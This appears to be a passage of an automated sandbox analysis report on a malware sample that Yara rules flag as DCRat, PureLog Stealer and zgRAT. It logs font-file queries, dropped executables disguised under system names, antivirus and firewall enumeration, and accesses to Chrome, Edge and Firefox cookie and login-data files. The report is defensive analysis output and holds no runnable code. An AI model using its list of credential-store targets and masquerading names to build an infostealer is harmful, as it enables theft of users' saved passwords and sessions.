                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeQueries volume information: C:\Program Files (x86)\jDownloader\smartscreen.exe VolumeInformation
                              Source: C:\Recovery\WmiPrvSE.exeQueries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeQueries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe VolumeInformation
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeQueries volume information: C:\Users\user\Desktop\r6cRyCpdfS.exe VolumeInformation
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000022.00000002.2932291233.000000000392E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000022.00000002.2932291233.0000000003C03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1753825476.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: r6cRyCpdfS.exe PID: 7268, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rCdgcwByUDmMcQzYkDZywyWr.exe PID: 2188, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: smartscreen.exe PID: 7376, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: r6cRyCpdfS.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.r6cRyCpdfS.exe.330000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1658435835.0000000000332000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\smartscreen.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: r6cRyCpdfS.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.r6cRyCpdfS.exe.330000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\smartscreen.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
